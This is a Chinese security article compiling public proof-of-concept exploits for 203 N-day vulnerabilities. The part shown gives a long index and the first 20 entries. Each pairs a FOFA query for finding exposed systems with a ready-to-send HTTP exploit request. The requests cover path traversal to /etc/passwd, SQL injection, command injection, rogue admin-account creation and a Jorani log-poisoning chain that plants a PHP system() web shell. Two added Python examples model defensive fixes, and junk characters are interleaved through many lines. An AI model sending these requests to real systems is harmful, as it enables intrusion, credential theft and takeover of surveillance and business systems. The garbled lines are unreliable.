Roundup of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06
道一安全, 2024-06-05 07:41, Beijing
The following article is reproduced from 网络安全新视界 (author: 网络安全新视界).

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world attack activity. This article is meant to help defenders; defensive teams can use its contents to check their own exposure.

Sources: the article covers 203 POCs for high-impact vulnerabilities disclosed publicly, in China and abroad, between September 2023 and May 2024. All of them were collected from other public accounts or websites and compiled for publication by the 网络安全新视界 team.

Patches: every vulnerability listed is public. For patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few very long POCs have their payload replaced by the literal word PAYLOAD. Search for the full POC yourself if you need it.

Legal: if any content infringes a party's lawful rights, contact the 网络安全新视界 team through the public account backend to have it removed.

Statement
To keep things simple and easy to browse, there is no "reply to receive the full list" gate. This article is the most complete version; to use it, open the page and search for keywords (F12).

Bookmark this article if it is useful to you, or follow the public account (网络安全新视界).
01  Table of contents

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController / Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-pass smart management platform 1.0.55.0.0.1 permission bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 DesignReportSave.jsp arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE O&M security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. tosei (Japan) self-service laundry machine RCE
87. Anheng (DBAPPSecurity) 明御 security gateway aaa_local_web_preview file upload
88. Anheng (DBAPPSecurity) 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QAX 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. QAX 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality testing system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass (template injection)
149. AJ-Report open-source dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 PACS (medical image archiving and communication system) WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully automated parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益价值管理系统 DownLoad.aspx arbitrary file read
168. Hongjing EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 project management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 (Aliyun Drive) WebDAV command injection
199. Cockpit assetsmanager_upload file upload
200. SeaCMS dmku SQL injection
201. 方正 full-media news editing system binary SQL injection
202. 微擎 (WeEngine) AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

02  POC list

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

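Added example, not code from Casdoor and not part of the original article: the request above works when a static-file handler joins the requested name onto its root without checking where the result lands. The block below shows that naive shape next to a hardened one that resolves the path first and refuses anything outside the static root. The temporary directory tree and file contents are constructed for illustration.

```python
"""Added example, not code from Casdoor or from the original article: a
static-file handler in the naive shape the /static/../ request above abuses,
beside a hardened version that confines every resolved path to the static
root.  The directory tree and file contents are constructed for illustration."""
import os
import tempfile
from typing import Optional


def serve_static_vulnerable(static_root: str, requested: str) -> Optional[bytes]:
    # Naive join: "../" segments in `requested` walk out of static_root.
    path = os.path.join(static_root, requested.lstrip("/"))
    if not os.path.isfile(path):
        return None
    with open(path, "rb") as fh:
        return fh.read()


def serve_static_hardened(static_root: str, requested: str) -> Optional[bytes]:
    root = os.path.realpath(static_root)
    # Resolve symlinks and ".." first, then refuse anything outside root.
    target = os.path.realpath(os.path.join(root, requested.lstrip("/")))
    if os.path.commonpath([root, target]) != root:
        return None  # traversal attempt: log it and answer 403 in a real handler
    if not os.path.isfile(target):
        return None
    with open(target, "rb") as fh:
        return fh.read()


def demo() -> dict:
    """Build <tmp>/static/app.js plus <tmp>/secret.txt outside the web root and
    report what each handler returns for a normal and a traversing request."""
    base = tempfile.mkdtemp()
    static = os.path.join(base, "static")
    os.mkdir(static)
    with open(os.path.join(static, "app.js"), "w") as fh:
        fh.write("console.log('ok');")
    with open(os.path.join(base, "secret.txt"), "w") as fh:
        fh.write("root:x:0:0")  # constructed stand-in for /etc/passwd
    traversal = "../secret.txt"
    deep = "../" * 11 + "etc/passwd"  # the shape used in the Casdoor request above
    return {
        "vuln_normal": serve_static_vulnerable(static, "app.js"),
        "vuln_traversal": serve_static_vulnerable(static, traversal),
        "hard_normal": serve_static_hardened(static, "app.js"),
        "hard_traversal": serve_static_hardened(static, traversal),
        "hard_deep": serve_static_hardened(static, deep),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The check is done on the resolved path, not on the request string: stripping "../" textually misses percent-encoded, doubled ("....//") and symlink variants, whereas realpath plus a commonpath comparison catches all of them at once.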

3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"
Set password to the MD5 of the password you want.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin UI with the default account admin, then send the following request:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<sysauth cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

PAYLOAD is the double URL encoding of the following statement:
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#


10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"
After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the following requests:
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST the login form. The language field traverses to application/logs, and the login field carries a PHP stub that runs a base64-decoded command taken from a request header, so the stub ends up in the log file:
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: send the following request to the target to run the id command. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command (it decodes to echo ---------;id 2>&1;echo ---------;):
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip


13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

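Added example, not jshERP's code and not part of the original article: items 14 and 15 both reach /user/getAllList without a session, and both rely on the same gap, namely an authentication check that looks at one representation of the path while the router dispatches on another. The block below models that gap with a toy filter (an assumption about the general shape of such filters, not jshERP's actual interceptor) and shows the hardened rule: normalise first, and refuse any URI whose normalised form differs from what the client sent. The protected route name is hypothetical.

```python
"""Added example, not jshERP's code and not from the original article: a toy
model of why the two requests above reach /user/getAllList without a session.
The assumption modelled here is that an authentication filter classifies the
raw request URI as a public static asset, while the routing layer that runs
afterwards dispatches on a normalised path.  The hardened rule normalises
first and refuses any URI whose normalised form differs from what was sent."""
import posixpath
import re
from urllib.parse import unquote

PUBLIC_SUFFIXES = (".ico", ".png", ".jpg", ".gif", ".js", ".css", ".html")
PROTECTED = {"/jshERP-boot/user/getAllList"}   # hypothetical protected route


def route_path(raw_uri: str) -> str:
    """The path the MVC layer ends up dispatching on: drop the query string and
    any ';param' matrix segments, percent-decode, then collapse '..' and '//'."""
    path = raw_uri.split("?", 1)[0]
    path = re.sub(r";[^/]*", "", path)   # /user/getAllList;.ico -> /user/getAllList
    path = unquote(path)
    return posixpath.normpath(path)      # /user/a.ico/../getAllList -> /user/getAllList


def is_public_naive(raw_uri: str) -> bool:
    # Vulnerable shape: decides on the raw URI, so "...;.ico" looks like an icon
    # (item 14).  Which exclusion rule item 15 slips through is not shown on the
    # page; the hardened check below refuses it regardless.
    return raw_uri.split("?", 1)[0].endswith(PUBLIC_SUFFIXES)


def is_public_hardened(raw_uri: str) -> bool:
    path = raw_uri.split("?", 1)[0]
    normalised = route_path(path)
    if normalised != path:
        return False   # ';', '%xx', '..' or '//' present: ambiguous, require auth
    return normalised.endswith(PUBLIC_SUFFIXES)


def audit(raw_uri: str) -> dict:
    """For one raw URI: where it routes, whether each rule treats it as public,
    and whether that lets an unauthenticated client reach a protected route."""
    routed = route_path(raw_uri)
    naive = is_public_naive(raw_uri)
    hard = is_public_hardened(raw_uri)
    return {
        "route": routed,
        "naive_public": naive,
        "hardened_public": hard,
        "naive_bypass": naive and routed in PROTECTED,
        "hardened_bypass": hard and routed in PROTECTED,
    }


if __name__ == "__main__":
    for uri in ("/jshERP-boot/user/getAllList;.ico",        # item 14
                "/jshERP-boot/user/a.ico/../getAllList",    # item 15, CVE-2024-0490
                "/jshERP-boot/user/getAllList",             # direct, must need auth
                "/jshERP-boot/favicon.ico"):                # genuine static asset
        print(uri, audit(uri))
```

The useful property of the hardened rule is that it never has to enumerate bypass tricks: anything the router would rewrite (matrix parameters, percent-encoding, dot segments, doubled slashes) fails the equality check and falls back to requiring authentication, while a plain /favicon.ico still passes.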
; Z. U+ C1 S7 Y% O6 x. O6 ]" Y16. 红帆HFOffice医微云SQL注入
4 G! }( B4 w( N) B, n, l6 BFOFA:title="HFOffice"
( @4 N( _0 K$ O; G5 y- w( Wpoc中调用函数计算1234的md5值4 v5 H! O: S; j( P- E+ B, A
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
1 Y, O( P# a& LHost: x.x.x.x
& }4 a5 S% {) t; U% wUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 [# [- \& h, I/ h
Connection: close
9 J% H3 p+ W4 |; aAccept: */*
7 P0 P& A7 Q* v) T1 p; q; i& @Accept-Language: en
8 P. Y; C5 Q$ z1 `% bAccept-Encoding: gzip
, j4 h2 w' v0 j( v3 `
3 y& i7 Y, i; }( P6 G6 m$ ~2 p( _
; R1 K; b8 m) {/ F17. 大华 DSS itcBulletin SQL 注入
: {* m0 @7 s4 a0 g- @FOFA:app="dahua-DSS"
$ r5 H6 X% M. M( s' EPOST /portal/services/itcBulletin?wsdl HTTP/1.19 x# I u( |! [ `" L$ p3 D, l2 y
Host: x.x.x.x3 B d* A/ U+ `8 z; _3 e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 x: N$ s0 I, v. g5 \! J2 w
Connection: close7 t1 Q/ `; ~& I# Z r. k
Content-Length: 345* G9 E: m- P$ v- `& Y" `
Accept-Encoding: gzip
: c. l# |3 U& V. `( K; K' K m; S% J+ l: Y& |. h
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>9 A! r% b5 d: u- P9 w. R9 l. X8 }% a
<s11:Body>' G6 C* Z# g, a. C6 w/ }
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
; ~$ ?3 J8 O4 P- y <netMarkings>( g& G w- R+ C6 U* _3 F. L
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
; b7 W- s+ W% {/ q </netMarkings>
/ i6 }' i L. Y( k) N6 U* [1 f9 \/ o </ns1:deleteBulletin>
/ X" G' I+ p& q2 C) Z! T </s11:Body>/ e1 S& ~% @2 B- a9 F
</s11:Envelope>
; n. d2 K# m' I* U7 `9 ?" M( a
% }6 a9 Q: l( N. p5 H4 Y
$ U2 M$ _$ W9 }% n- m5 z' h18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
' j7 |- g6 j' r% K3 S7 \! jFOFA:app="dahua-DSS"
: G& h6 ]( c6 m; \/ I: d! W6 q" mGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1+ @- E, L% F( b3 w
Host: your-ip
( U5 X5 r* S& u2 ]. a& n3 p( PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 z ]) Q8 Q1 t7 _8 g `0 T a
Accept-Encoding: gzip, deflate
P7 g+ n3 R5 ~; L: Q+ y5 K N* N$ dAccept: */*: z1 {' E! ~7 F. B5 g
Connection: keep-alive$ c* [! |( q4 v5 K5 m0 C1 x- ]! b0 D2 v
1 _; V& \: U2 k4 W( s/ L
3 C6 t3 I: E# a0 Z6 h
# y F( x8 n' b0 K# } B; p" O# F19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入) o. F, ]6 N: k% p# t9 _2 N
FOFA:app="dahua-DSS"
. ~0 N6 m) t# C0 g& k0 d" m3 [: oGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
# Z# N9 j O! n( {7 Q% fHost:9 k3 V4 v" v+ Z; A9 u6 s$ ]; I
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36% \5 d3 d t% Z1 K+ W
Accept-Encoding: gzip, deflate( R; F2 R' T& T) X* g
Accept: */*7 T$ l7 P) i8 a% |2 ^% B
Connection: keep-alive
( g [: [; Q; h, e' c5 n4 m6 U. R$ A. @3 r7 J
' c: ^8 O; U- U" V2 d' Z- |
20. 大华ICC智能物联综合管理平台任意文件读取) F$ y8 r( U, l7 W
FOFA:body="*客户端会小于800*"
% B, [( R% _( E0 n' CGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1 M. C _6 r' l `$ u! G
Host: x.x.x.x
